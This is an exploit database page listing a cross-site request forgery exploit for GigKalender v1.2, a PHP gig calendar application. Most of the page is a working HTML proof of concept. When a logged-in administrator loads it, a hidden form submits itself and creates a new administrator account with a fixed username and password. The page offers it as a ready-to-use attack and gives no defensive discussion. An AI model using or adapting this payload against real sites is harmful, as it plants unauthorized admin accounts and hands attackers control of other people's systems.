[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GigKalender v1.2 CSRF Vulnerability

Author
DaOne
Risk
[
Security Risk Low
]
0day-ID
0day-ID-19284
Category
web applications
Date add
29-08-2012
Platform
php
# Exploit Title: GigKalender v1.2 CSRF Vulnerability
# Author: DaOne (@LibyanCA)
# Vendor: http://www.paderdesign.de/gigkalender/features.html


# CSRF Add Admin

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/index.php?submenue=admin&inhalt=addUser&job=add">
<input type="hidden" name="UserName" value="webadmin"/>
<input type="hidden" name="UserStatus" value="Admin"/>
<input type="hidden" name="UserNewPassword" value="pass123">
<input type="hidden" name="UserNewPasswordRepeated" value="pass123">
<input type="hidden" name="UserEmailadress" value="admin@email.com">
<input type="hidden" name="UserSession" value=""/>
<input type="hidden" name="UserLanguage" value="english"/>
<input type="hidden" name="UserBackendCalenderListColsTranslated" value=""/>
<input type="hidden" name="UserRightEmail" value="1"/>
<input type="hidden" name="UserRightAddNews" value="1"/>
<input type="hidden" name="UserRightEditNews" value="1"/>
<input type="hidden" name="UserRightDeleteNews" value="1"/>
<input type="hidden" name="UserBackendCalenderListCols" value="GigBeginning, GigArtist, GigLocation, GigEvent, GigVenue, GigLineup, GigStageBuilding, GigNotes, GigIsPrivate, GigPublish"/>
<input type="hidden" name="senden" value="Save"/>
</form>
</body>
</html>



#  0day.today [2024-12-24]  #